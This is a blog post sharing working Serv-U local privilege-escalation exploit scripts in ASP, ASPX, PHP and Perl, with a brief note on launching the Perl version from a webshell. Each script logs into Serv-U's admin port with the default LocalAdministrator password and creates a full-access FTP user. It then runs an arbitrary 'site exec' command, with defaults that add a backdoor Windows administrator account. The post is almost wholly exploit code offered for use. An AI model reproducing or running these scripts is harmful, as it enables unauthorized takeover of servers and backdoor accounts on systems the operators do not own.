elva

分享serv-u利用脚本(asp/aspx/php/perl)

ASP


<%
'Serv-U asp 提权程序
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if  not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
    set a=Server.CreateObject("Microsoft.XMLHTTP")
    a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
    set session("a")=a
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%>...<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 2
    set b=Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
    b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>正在提升权限,请等待...,<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 3
    set c=Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
    c.send loginuser & loginpass & mt & deldomain & quit
    set session("c")=c
%>
<center>提权完毕,已执行了命令:<br><font color=red><%=cmd%></font><br><br>
<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">
</center>
<%
case else
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>
<center><form method="post" name="goldsun">
<table width="494" height="163" border="1" cellpadding="0" cellspacing="1" bordercolor="#666666">
  <tr align="center" valign="middle">
    <td colspan="2">Serv-U 提升权限 ASP版 Goldsun[at]84823714</td>
  </tr>
  <tr align="center" valign="middle">
    <td width="100">用户名:</td>
    <td width="379"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>口 令:</td>
    <td><input name="p" type="text" id="p" value=" #l@$ak#.lk;0@P"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>端 口:</td>
    <td><input name="port" type="text" id="port" value="43958"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>系统路径:</td>
    <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>命 令:</td>
    <td><input name="c" type="text" id="c" value="cmd /c net user goldsun love /add & net localgroup administrators goldsun /add" size="50"></td>
  </tr>
 
  <tr align="center" valign="middle">
    <td colspan="2"><input type="submit" name="Submit" value="提交"> 
      <input type="reset" name="Submit2" value="重置">
      <input name="action" type="hidden" id="action" value="1"></td>
  </tr>
</table></form></center>
<% end select
function Gpath()
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
 gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>


ASPX


<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

'
' Love, where are you ?

Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text

Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-deleteDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

'Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub


Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
admin by lake2</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
<asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
</p>
<p>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />
<!-- insert content here -->
</p>
</form>
</body>
</html>


PHP


<?php
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
  $sendbuf = "";
  $recvbuf = "";
  $domain = "-SETDOMAIN\r\n".
      "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
      "-TZOEnable=0\r\n".
      " TZOKey=\r\n";
  $adduser = "-SETUSERSETUP\r\n".
      "-IP=0.0.0.0\r\n".
      "-PortNo=2121\r\n".
      "-User=Will_Be\r\n".
      "-Password=Will_Be\r\n".
      "-HomeDir=c:\\\r\n".
      "-LoginMesFile=\r\n".
      "-Disable=0\r\n".
      "-RelPaths=1\r\n".
      "-NeedSecure=0\r\n".
      "-HideHidden=0\r\n".
      "-AlwaysAllowLogin=0\r\n".
      "-ChangePassword=0\r\n".
      "-QuotaEnable=0\r\n".
      "-MaxUsersLoginPerIP=-1\r\n".
      "-SpeedLimitUp=0\r\n".
      "-SpeedLimitDown=0\r\n".
      "-MaxNrUsers=-1\r\n".
      "-IdleTimeOut=600\r\n".
      "-SessionTimeOut=-1\r\n".
      "-Expire=0\r\n".
      "-RatioUp=1\r\n".
      "-RatioDown=1\r\n".
      "-RatiosCredit=0\r\n".
      "-QuotaCurrent=0\r\n".
      "-QuotaMaximum=0\r\n".
      "-Maintenance=None\r\n".
      "-PasswordType=Regular\r\n".
      "-Ratios=None\r\n".
      " Access=c:\\|RELP\r\n";
  $deldomain="-DELETEDOMAIN\r\n".
      "-IP=0.0.0.0\r\n".
      " PortNo=2121\r\n";
  $sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER ".$_POST["User"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS ".$_POST["Pass"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "SITE MAINTENANCE\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $domain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $adduser;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Exploit ...<br>";
  echo "**********************************************************<br>";
  $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "site exec ".$_POST["Command"]."\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["Command"]."</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Delete Domain ...<br>";
  echo "**********************************************************<br>";
  $sendbuf = $deldomain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  fclose($sock);
  fclose($exp);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" c>
<title>Serv-U Local Exploit By Will_Be</title>
</head>

<body>
<form method="post">
LocalPort:
<input name="Port" type="text" id="Port" value="43958">
<br>
LocalUser:
<input name="User" type="text" id="User" value="LocalAdministrator">
<br>
LocalPass:
<input name="Pass" type="text" id="Pass" value="#l@$ak#.lk;0@P">
<br>
Command :
<input name="Command" type="text" id="Command" value="net user Will_Be heihei /add">
<br>
<input type="submit" name="Submit" value="提交">  
<input type="reset" name="Submit" value="重置">
</form>
</body>
</html>


Perl
Perl的默认安装路径是:C:\Perl
然后使用:
perl 你的pl文件的路径。
在WEBSHELL中的路径是这样的:
C:\perl\bin\perl 你的pl文件的路径
#!/usr/bin/perl
use IO::Socket;

binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$addr = "127.0.0.1";
$ftpport = 21;
$adminport = 43958;
$adminuser = "LocalAdministrator";
$adminpass = '#l@$ak#.lk;0@P';
$user = "h4x0r";
$password = "123456";
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';


use IO::Socket::INET;

$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";

print "TEST<br><br>";

print $sock "USER $adminuser\r\n";
sleep (1);
print $sock "PASS $adminpass\r\n";
sleep(1);
print $sock "SITE MAINTENANCE\r\n";
sleep(1);
print $sock "-SETUSERSETUP\r\n";
print $sock "-IP=".$addr."\r\n";
print $sock "-PortNo=".$ftpport."\r\n";
print $sock "-User=".$user."\r\n";
print $sock "-Password=".$password."\r\n";
print $sock "-HomeDir=".$homedir."\r\n";
print $sock "-LoginMesFile=\r\n";
print $sock "-Disable=0\r\n";
print $sock "-RelPaths=0\r\n";
print $sock "-NeedSecure=0\r\n";
print $sock "-HideHidden=0\r\n";
print $sock "-AlwaysAllowLogin=0\r\n";
print $sock "-ChangePassword=1\r\n";
print $sock "-QuotaEnable=0\r\n";
print $sock "-MaxUsersLoginPerIP=-1\r\n";
print $sock "-SpeedLimitUp=-1\r\n";
print $sock "-SpeedLimitDown=-1\r\n";
print $sock "-MaxNrUsers=-1\r\n";
print $sock "-IdleTimeOut=600\r\n";
print $sock "-SessionTimeOut=-1\r\n";
print $sock "-Expire=0\r\n";
print $sock "-RatioUp=1\r\n";
print $sock "-RatioDown=1\r\n";
print $sock "-RatiosCredit=0\r\n";
print $sock "-QuotaCurrent=0\r\n";
print $sock "-QuotaMaximum=0\r\n";
print $sock "-Maintenance=System\r\n";
print $sock "-PasswordType=Regular\r\n";
print $sock "-Ratios=None\r\n";
print $sock " Access=".$homedir."|RWAMELCDP\r\n";
print $sock "QUIT\r\n";


@ret=<$sock>;
print "@ret";

close(STDERR);
close(STDOUT);
exit;

posted on 2007-08-04 15:17 叶子 阅读(739) 评论(0)  编辑 收藏 引用 所属分类: 网络安全


只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   知识库   博问   管理